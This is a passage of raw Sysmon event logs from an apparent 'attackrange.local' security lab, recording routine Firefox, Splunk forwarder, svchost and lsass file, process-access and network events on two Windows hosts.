Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=10EBED91417B31888BF10C740C6673A3,SHA256=19F97108432F5ECB1DFBBB20E7179042AF5E3EE4DE0E1E7F7EC63AE5B006B2E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CE7D2737073FE52149B5F85FF81AB6C4,SHA256=8783AC33C99D99FF6C025C0425D2980E7F77EC0271E681393F09A8C844FD889C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=51A91CC51EEDE4421F5C6A5DCA937C1B,SHA256=E8B2641C2D32F11905A59DD779F65112E6791117D46CC0720F8A8614D6137BFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.346{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C2B8711949AB25B1E702DB9CE573CCAB,SHA256=DDE98E2C37897771403A7E81D09B36213D28E5EF4AA5737E8F702E284C5DF1F3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.099{466BC892-F36C-60EB-027D-00000000CF01}386410176C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:53.046{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED6EB7765836A2C132DD6962A3B8CEE0,SHA256=A41F375A620105E9D3412C2BE7DD1B39286C3ECB2DD41E253A8E977388D46E5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806584Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:54.444{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CDEDF10EB49133D95327880D42094D9,SHA256=7E44B2100403BB6EC7305324E365C6E7C7D9961E4C1EB1A566BAEB62A2675393,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:46.746{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50945-false10.0.1.12-8000- 10341000x80000000000000001046818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.279{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.263{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.264{466BC892-F36E-60EB-047D-00000000CF01}5252C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:54.063{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF137B5579B4499F713B1992131E8DB4,SHA256=A0A44D3CD69352C058AE0B345F1354BEFA8633D5D1C9878F91674F3C0EB427A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806586Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:55.476{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5765694CE7F4FB67D31BCEF68141FAD8,SHA256=355E7139ECB330B704A65AB1EA9FA281FAA9A8D55E11FD4E9A27BB39F5675699,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:55.477{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001046821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:55.277{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3E4EC8D511263FF309F93133E5C5F6F5,SHA256=8A71CD7060485E73B932B6A353D9C66F511B9EF309BC60E9A9F3334C836A2F70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:55.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD444D25E2B3337020EC381426B1BF31,SHA256=D944ACD750B2478771ECACB5B0AB03D7EA5B423B821498EA456FB0A8B825B013,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806585Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:53.383{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57194-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806587Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:56.491{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5B19CD291A61788855739C4F19B502F,SHA256=412F9B8BA192B2BDEF0FB5F856795787D6E9239493067A8CBD1DFE09534FD7F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.813{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.031{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50946-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001046825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:49.031{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50946-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x80000000000000001046824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.495{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21B1BC3003397E4DEC2C3E102290B215,SHA256=8453FAAD31E1DBC1583356240EA63C671EEF9528675ADBE50B64E1EFB8A8C3EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:56.130{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08140E561B6D7F3196EF92AAF5736EDC,SHA256=4BF72C9695842D27609C769D806F582C3449A3984E902D5812813052B58A423E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806588Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:57.507{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=396345C5371DE500958864C741976EAA,SHA256=708A0015944A0495CF30AB2EF1A2BCC43BDE56C49C8F6C4E9C35E63EE19184F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:57.144{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9DA732B9A1BA8B8852B39BED568D7285,SHA256=7D79161EB2F5955E35F06748510710AB162E50B345D38CC9928F4484B88724CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806589Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:58.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C6766566793F8D6609DB589DFF5B583,SHA256=26100CB5A5BDA6F358D3801444A772773833CD72F86057EBA1490075A30FFD7E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046831Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:50.347{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50947-false10.0.1.12-8089- 23542300x80000000000000001046830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:58.160{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE26D65AF0CF318C27D3D10761E39468,SHA256=563C79283921760DEC92BFB116D82DB6B605502CAAB8E3BC6D530E83A05C5EA0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:58.076{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf64733f.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806590Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:59.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FAED2CB62FC8EC810C8D3003C0BC88D,SHA256=13EA716D6620E843728283062F9A7BB8766CA8578C1EA9C52156A8DFBB9CDC46,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046833Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:59.543{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046832Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:59.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70359B6DD03CBB5FA774F2D1E15F213B,SHA256=1619EAA9087006614CF2CD46128EB2ECD420F487263C38ABA283C19C4745DE78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806591Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:00.601{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E65B409B051CB22BCD618CA38C3CA61,SHA256=AD89AA12821947020D33CC7EB4F39A38B41BCA83F4001C9088A04AD68E8CD347,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046843Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046842Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-6E0B-00000000CF01}6608C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046841Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.810{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046840Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:52.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50948-false10.0.1.12-8000- 10341000x80000000000000001046839Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:00.611{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+